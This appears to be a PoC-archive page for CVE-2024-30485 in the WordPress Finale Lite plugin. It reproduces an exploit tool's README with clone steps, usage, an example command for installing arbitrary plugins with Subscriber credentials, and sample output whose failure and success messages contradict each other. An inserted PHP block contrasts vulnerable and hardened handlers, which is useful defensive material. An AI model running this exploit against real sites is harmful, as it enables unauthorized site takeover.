
PoC details: 665248e3ec7fd6a26397c26c13d4370d55db217a

Source
Related vulnerability
Title: WordPress plugin Finale Lite security vulnerability (CVE-2024-30485)
Description: WordPress and WordPress plugins are products of the WordPress Foundation. WordPress is a blogging platform written in PHP that lets users host a personal blog on a server running PHP and MySQL. A WordPress plugin is an add-on application for that platform. The Finale Lite plugin for WordPress, version 2.18.0 and earlier, contains a security vulnerability caused by a missing authorization check.
Description
WordPress Finale Lite plugin <= 2.18.0 - Subscriber+ Arbitrary Plugin Installation/Activation vulnerability
Introduction
# CVE-2024-30485 Exploit

## 📌 Overview

**CVE-2024-30485** is a high-severity vulnerability in the **Finale Lite** plugin for WordPress (versions <= 2.18.0). A plugin action that installs and activates plugins does not verify the caller's capabilities, so any authenticated user with the Subscriber role or higher can install and activate arbitrary plugins, an operation WordPress normally reserves for administrators.

- **Severity**: HIGH (CVSS 8.8)
- **Affected Versions**: Finale Lite <= 2.18.0
- **CWE**: CWE-862 (Missing Authorization)
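The following PHP is an added defender-side illustration of the CWE-862 pattern described above; it is not code from this repository or from the Finale Lite plugin, and the page does not identify the plugin's actual handler. The hook name `wp_ajax_example_install_plugin`, the `example_*` function names and the `nonce` and `plugin` request fields are all assumptions chosen for the example. It shows a hypothetical admin-ajax install handler that omits authorization beside a hardened version that checks a nonce and the capabilities WordPress core itself requires for plugin installation and activation.

```php
<?php
// Added illustration, NOT Finale Lite code. Hook and function names are assumptions.
// Any logged-in user (Subscriber included) can reach wp_ajax_* actions, so the
// handler itself must verify capability and intent.

// VULNERABLE pattern (CWE-862): no nonce check and no capability check, so a
// Subscriber who knows the action name can install and activate any plugin.
// Shown for contrast only; it is deliberately NOT registered with add_action().
function example_install_plugin_vulnerable() {
    $slug = sanitize_key( $_POST['plugin'] ?? '' );
    example_do_install_and_activate( $slug );
    wp_send_json_success( 'Plugin installed and activated successfully!' );
}

// HARDENED pattern: verify a nonce bound to this action, then require the same
// capabilities core uses for the Plugins screen before doing anything.
add_action( 'wp_ajax_example_install_plugin', 'example_install_plugin_hardened' );
function example_install_plugin_hardened() {
    // check_ajax_referer() terminates the request with -1 if the nonce is missing or stale.
    check_ajax_referer( 'example_install_plugin', 'nonce' );

    if ( ! current_user_can( 'install_plugins' ) || ! current_user_can( 'activate_plugins' ) ) {
        wp_send_json_error( 'Insufficient permissions.', 403 );
    }

    $slug = sanitize_key( $_POST['plugin'] ?? '' );
    if ( '' === $slug ) {
        wp_send_json_error( 'Missing plugin slug.', 400 );
    }
    example_do_install_and_activate( $slug );
    wp_send_json_success( 'Plugin installed and activated successfully!' );
}

// Shared install helper built on core's Plugin_Upgrader (illustrative, not the plugin's own).
function example_do_install_and_activate( $slug ) {
    require_once ABSPATH . 'wp-admin/includes/class-wp-upgrader.php';
    require_once ABSPATH . 'wp-admin/includes/plugin-install.php';
    require_once ABSPATH . 'wp-admin/includes/plugin.php';

    // Resolve the slug to a download URL via the wordpress.org API.
    $api = plugins_api(
        'plugin_information',
        array( 'slug' => $slug, 'fields' => array( 'sections' => false ) )
    );
    if ( is_wp_error( $api ) ) {
        wp_send_json_error( $api->get_error_message(), 400 );
    }

    // WP_Ajax_Upgrader_Skin buffers feedback instead of echoing it, which keeps
    // the JSON response clean; an echoing skin would prepend HTML to the JSON.
    $upgrader = new Plugin_Upgrader( new WP_Ajax_Upgrader_Skin() );
    $result   = $upgrader->install( $api->download_link );
    if ( is_wp_error( $result ) || ! $result ) {
        wp_send_json_error( 'Install failed.', 500 );
    }

    $activated = activate_plugin( $upgrader->plugin_info() );
    if ( is_wp_error( $activated ) ) {
        wp_send_json_error( $activated->get_error_message(), 500 );
    }
}
```

The two checks are independent: the nonce proves the request came from a page this site rendered for this user, and the capability check proves the user is allowed to perform the action. A nonce alone is not authorization, since a Subscriber can obtain a valid nonce from any page that embeds it, which is exactly the step the "Extract security nonce" feature below performs. The choice of an AJAX upgrader skin also explains the output quoted later on this page, where HTML progress messages precede the JSON body.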

## 🚀 Features

- ✅ Check if a WordPress site is vulnerable
- ✅ Authenticate with valid credentials
- ✅ Extract security nonce
- ✅ Install arbitrary plugins
- ✅ Activate installed plugins

## 🛠 Requirements

- Python 3
- `requests` and `beautifulsoup4` modules
- Target WordPress site with a vulnerable plugin
- Valid WordPress Subscriber+ credentials

## 📜 Installation

```bash
# Clone the repository
git clone https://github.com/Nxploited/CVE-2024-30485.git
cd CVE-2024-30485

# Install dependencies
pip install -r requirements.txt
```

## 🔍 Usage

```bash
usage: CVE-2024-30485.py [-h] -u TARGET -U USERNAME -P PASSWORD [plugin]

Exploit CVE-2024-30485 - Finale Lite | # by Khaled AlEnazi

positional arguments:
  plugin                Plugin slug

options:
  -h, --help            show this help message and exit
  -u TARGET, --url TARGET  WordPress site URL
  -U USERNAME, --username USERNAME  WordPress username
  -P PASSWORD, --password PASSWORD  WordPress password
```

### Example:
```bash
python3 CVE-2024-30485.py -u target -U admin -P admin -- disable-comments
```

## 🖥 Output Example

```bash
[+] Target is vulnerable! Detected version: 2.18.0
[+] Logged in successfully.
[+] Extracted Nonce: 2b46e05bc0
[-] Failed to install plugin.
Server Response: 
<p>Unpacking the package&#8230;</p>
<p>Installing the plugin&#8230;</p>
<p>Plugin installed successfully.</p>
</div>{"success":true,"data":"Plugin installed and activated successfully!"}
```

## ⚠️ Disclaimer

This script is for **educational and security research purposes only**. Unauthorized testing against systems **without permission** is illegal. Use responsibly.

## 🔗 References
- [Official CVE Record](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-30485)
- [WordPress Plugin Page](https://wordpress.org/plugins/finale-woocommerce-sales-countdown-timer-discount/)

*By: Khaled Alenazi (Nxploit)*
File snapshot

```
[4.0K] /data/pocs/665248e3ec7fd6a26397c26c13d4370d55db217a
├── [4.7K] CVE-2024-30485.py
└── [2.3K] README.md

0 directories, 2 files
```

Notes
    1. Access through the original source is recommended.
    2. If the source is no longer available or cannot be reached, send an email to f.jinxu#gmail.com to request the local snapshot (replace # with @).
    3. This PoC code has been snapshotted for you; to support long-term maintenance, please consider paying for or donating toward the local PoC archive. Thank you for your support.